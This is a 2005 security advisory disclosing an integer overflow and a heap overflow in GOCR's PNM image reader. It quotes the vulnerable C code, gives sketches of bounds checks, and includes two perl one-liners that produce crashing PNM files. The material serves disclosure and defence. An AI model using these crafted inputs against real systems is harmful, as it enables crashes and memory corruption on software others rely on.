[Overflow.pl] GOCR - Multiple vulnerabilities
Overflow.pl Security Advisory #1
GOCR - Multiple vulnerabilities
URL: http://www.overflow.pl/adv/gocr.txt
Date: 04.05.2005
1. Background
GOCR is an OCR (Optical Character Recognition) program, developed under the GNU
Public License. It converts scanned images of text back to text files. Joerg
Schulenburg started the program, and now leads a team of developers.
GOCR can be used with different front-ends, which makes it very easy to port to
different OSes and architectures. It can open many different image formats, and
its quality has been improving on a daily basis.
http://jocr.sourceforge.net/index.html
2. Description
In my opinion GOCR should be rewritten, because it has many implementation
and security problems. I examined only the function that reads PNM image
files. Both versions of it (the one that uses the netpbm library and the one
that does not) contain critical security vulnerabilities. Local exploitation
of a heap overflow and an integer overflow in GOCR could allow an attacker to
execute arbitrary code.
2.1. Integer overflow in readpgm() (version that uses the netpbm library)
An integer overflow leading to a heap overflow exists when GOCR reads a
specially crafted PNM file. The vulnerable code is in the version of readpgm()
that uses the netpbm library:
src/pnm.c:
...
/*
for simplicity only PAM of netpbm is used, the older formats
PBM, PGM and PPM can be handled implicitly by PAM routines (js05)
*/
#ifdef HAVE_PAM_H
void readpgm(char *name, pix * p, int vvv) {
...
/* read pgm */
pnm_readpaminit(fp, &inpam, sizeof(inpam));
p->x = inpam.width;
p->y = inpam.height;
if ( !(p->p = (unsigned char *)malloc(p->x*p->y)) )
F1("Error at malloc: p->p: %d bytes", p->x*p->y);
...
for ( i=0; i < inpam.height; i++ ) {
pnm_readpamrow(&inpam, tuplerow);
for ( j = 0; j < inpam.width; j++ ) {
...
p->p[i*inpam.width+j] = sample;
...
}
}
}
If the result of p->x*p->y overflows the integer type, too little memory is
allocated for the image buffer. For example, if the image height is 4 and the
width is 1073741825, the product is 2^32 + 4, which wraps to 4 in 32-bit
arithmetic, so only 4 bytes are allocated. This leads to a heap overflow when
the pixel data of the PNM file is read.
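The arithmetic above can be reproduced in isolation. The following is a
minimal sketch, not code from GOCR: wrapped_area32() and checked_area() are
hypothetical helper names introduced here for illustration. The first shows
the 32-bit wraparound; the second shows one possible way to reject such
dimensions before calling malloc(), assuming the buffer is indexed with int
as in the excerpt above.

```c
#include <limits.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: reproduces the 32-bit wraparound of width*height.
   The product is computed in 64 bits and then truncated to 32 bits. */
static uint32_t wrapped_area32(uint32_t width, uint32_t height)
{
    return (uint32_t)((uint64_t)width * (uint64_t)height);
}

/* Hypothetical helper: stores width*height in *out and returns 1 only if
   both dimensions are positive and the product fits in an int (the type
   used for the pixel index in the excerpt). Returns 0 otherwise. */
static int checked_area(int width, int height, size_t *out)
{
    if (width <= 0 || height <= 0)
        return 0;
    if (width > INT_MAX / height)   /* product would exceed INT_MAX */
        return 0;
    *out = (size_t)width * (size_t)height;
    return 1;
}
```

With these helpers, wrapped_area32(1073741825, 4) yields 4, while
checked_area(1073741825, 4, &n) fails, so a caller could refuse the file
instead of allocating a 4-byte buffer.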
2.2. Heap overflow in readpgm() (version that does not use the netpbm library)
A heap overflow exists when GOCR reads a specially crafted plain PNM file (P3
format). The vulnerable code is in the version of readpgm() that does NOT use
the netpbm library:
src/pnm.c:
/*
if PAM not installed, here is the fallback routine,
which is not so powerful
*/
void readpgm(char *name,pix *p,int vvv){
...
pic=(unsigned char *)malloc( nx*ny );
...
if( c2=='3' )for(mod=k=j=i=0;i<nx*ny*3 && !feof(f1);){
c1=read_char(f1);
if( !isdigit(c1) ) { if( !isspace(c1) )F0("unexpected char");
if(1&mod) { k+=j; if(mod==5){ pic[i]=k/3; i++; }
j=0; mod=(mod+1)%6; } }
else { j=j*10+c1-'0'; if(!(mod&1)) mod++; };
}
...
The array pic holds only nx*ny elements, but the loop runs while "i<nx*ny*3 &&
!feof(f1)". Since i is incremented once per stored pixel, a file that contains
more than nx*ny pixels makes the loop write past the end of pic.
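One way to keep the write index inside the buffer is to bound the loop by the
number of pixels rather than the number of samples. The following is a minimal
sketch under stated assumptions, not the GOCR code or an official fix:
read_p3_gray() is a hypothetical function name, the stream is assumed to be
positioned just after the P3 header, and the maximum sample value is assumed
to be 255.

```c
#include <stddef.h>
#include <stdio.h>

/* Hypothetical replacement for the P3 loop. Reads at most npixels RGB
   triples from f and stores the average of each triple in pic.
   Returns the number of pixels actually stored (never more than npixels). */
static size_t read_p3_gray(FILE *f, unsigned char *pic, size_t npixels)
{
    size_t i;

    for (i = 0; i < npixels; i++) {
        unsigned r, g, b;

        /* Stop on end of file or malformed input. */
        if (fscanf(f, "%u %u %u", &r, &g, &b) != 3)
            break;
        /* Assumption: maxval is 255, so larger samples are rejected. */
        if (r > 255 || g > 255 || b > 255)
            break;
        pic[i] = (unsigned char)((r + g + b) / 3);
    }
    return i;
}
```

Any samples beyond npixels triples are simply left unread, so extra data in
the file cannot move the write index past the end of the buffer.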
3. Detection
The current GOCR version (0.40) is vulnerable. Older versions are probably
vulnerable too.
4. PoC
Integer overflow:
bash-2.05b$ perl -e 'print "P3\n4 1073741825\n255\n"; print "0 "x1024' > vuln.pnm
bash-2.05b$ ./gocr vuln.pnm
Segmentation fault (core dumped)
Heap overflow:
bash-2.05b$ perl -e 'print "P3\n10 10\n255\n"; print "0 "x1024' > vuln.pnm
bash-2.05b$ ./gocr vuln.pnm
Segmentation fault (core dumped)